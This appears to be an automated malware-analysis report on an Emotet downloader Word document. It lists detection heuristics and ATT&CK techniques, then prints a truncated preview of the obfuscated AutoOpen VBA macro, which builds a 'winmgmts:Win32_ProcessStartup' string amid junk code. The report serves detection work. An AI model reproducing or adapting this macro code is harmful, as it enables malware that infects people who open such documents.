MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865931-0', strongly suggesting the Emotet family. Static analysis revealed a VBA macro with an AutoOpen function that utilizes GetObject, a common technique for executing malicious code. The presence of a VBA macro and the ClamAV signature indicate a downloader functionality, likely to fetch and execute a secondary payload. The embedded URL, though benign, is noted.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865931-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865931-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56843 bytes |
SHA-256: 4e9a74e0eefcb7e7198c519bb9687b15a3f6b1f3225c766ab5853b160cc1b0db |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "r3_85__5"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "j1727_"
Function I_2_93()
Select Case b_11____
Case 73203527
Set M_9_3144 = P_921_32
F_57999_ = (I27_768 * Fix(178987642 / CBool(I2_34_))) - s_0_34_5 / Oct(606445891) / 157413744 + CStr(W54_047) - 785343733 + ChrB(R_70013)
Set m3922_ = K13_6_1_
End Select
Select Case n90732
Case 831074526
Set J30_658_ = W219_2
f8__0_14 = (j46283_ * Fix(190017848 / CBool(B_8___7))) - B0552463 / Oct(316905375) / 482778063 + CStr(I312__58) - 843425485 + ChrB(Q7__1_3_)
Set b2_6_5 = B7039_
End Select
Select Case A393__50
Case 704924015
Set m9___2_9 = r619868
n_26379 = (O9_6_0_9 * Fix(128310735 / CBool(R_6623_9))) - i_433_ / Oct(603402391) / 191416489 + CStr(G_250_6) - 442532342 + ChrB(v4203_8_)
Set i_060_84 = P66196_1
End Select
Select Case U_17176
Case 601813333
Set r8_61153 = b5__277
I345_63 = (z_1_25_ * Fix(41561826 / CBool(N72377_))) - C69__2__ / Oct(552151791) / 221392231 + CStr(r8_316) - 702649844 + ChrB(I1_25_1_)
Set G55736_3 = c4__56_
End Select
Select Case z90_7_78
Case 492277147
Set m__866 = O95_3___
c0121290 = (F_0725_ * Fix(494110686 / CBool(q39725))) - Z_7_40_7 / Oct(136307424) / 658405674 + CStr(u_6286__) - 775575686 + ChrB(Z411619_)
Set v31_391 = K49_42_
End Select
Select Case B__4171_
Case 652176060
Set T_950_5 = t_47_680
s1_96__2 = (u5158_7_ * Fix(634069949 / CBool(k06_10))) - h_52_79 / Oct(440967238) / 166360103 + CStr(n____8_) - 877453112 + ChrB(w01_9368)
Set N88_193 = w859447_
End Select
Select Case H_1_2_10
Case 168197645
Set Q_0358_4 = Z455_03
C_1__8 = (k_2_50_ * Fix(234008729 / CBool(X05__73))) - j053__1_ / Oct(90888690) / 282396017 + CStr(i2_28_03) - 578601022 + ChrB(I204_3)
Set l3_7_68 = P____0
End Select
Select Case H_5_7023
Case 469318133
Set w8__90 = I2_7_64
S97____9 = (i1_9_2_ * Fix(649225998 / CBool(D27__6_3))) - W426__4 / Oct(110003264) / 122895531 + CStr(O0286372) - 381621500 + ChrB(D_943816)
Set J735_9_1 = b8__6567
End Select
End Function
Function O5_501_9(m1_8324_, B_035_)
On Error Resume Next
Select Case Y_235709
Case 380850347
Set k3_0330 = L056_91_
w04381 = (D_277_97 * Fix(877217687 / CBool(h46568))) - k306_65 / Oct(773960519) / 935570374 + CStr(Y9769_) - 800372286 + ChrB(Z_80__)
Set c6_9_819 = U12201_
End Select
Select Case m1_4_49
Case 421748949
Set v_4__34 = C993_48
E9_292 = (Q26717 * Fix(853485144 / CBool(M_1___17))) - G_213975 / Oct(823484808) / 650816908 + CStr(J48_3_) - 867296670 + ChrB(n8_199)
Set r_9049 = D3_821
End Select
Select Case T_27_317
Case 613883373
Set I25706 = i874__
Y8812672 = (S_1___6_ * Fix(178789198 / CBool(n_772_))) - i58869_2 / Oct(766988965) / 999219310 + CStr(I__104_) - 804099342 + ChrB(z_88_928)
Set E4_7_70 = s9_643__
End Select
f_452_ = A85_5___ + "winm" + "gmts:Win32" + A4138_ + "_ProcessStartup" + M390104
Select Case H__7_68
Case 980539786
Set j013_6_ = E35_1_3
I708420 = (B587_491 * Fix(303405247 / CBool(O2_064))) - z_887__6 / Oct(858164566) / 171357939 + CStr(b17__297) - 92230158 + ChrB(f__610_2)
Set u__8_19 = n__5849_
End Select
Select Case b39774_
Case 169910316
Set U6_9319 = f_1__639
X7_59_0 = (m_1611 * Fix(679626045 / CBool(M06765))) - Y702509 / Oct(833851975) / 644076260 + CStr(D4_7460) - 922866463 + ChrB(B049_59)
Set B0_24412 = W9624_
End Select
Select Case c33381
Case 778150247
Set N__9_55_ = s903_1__
z_9_536_ = (Z371_298 * Fix(936633686 / CBool(o5268_))) - G8343_ / Oct(474585312) / 165407149 + CStr(j_94_5) - 681157296 + ChrB(W_77_1_)
Set Z9_5676 = w425__4
End Select
j0364298 = F106__ + "winm" + "gmts:Win32" + Y8751_0_ + "_Process" + F04454
Select Case r_719_0
Case 369166872
Set h51_9_ = A6953_2_
k2_1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.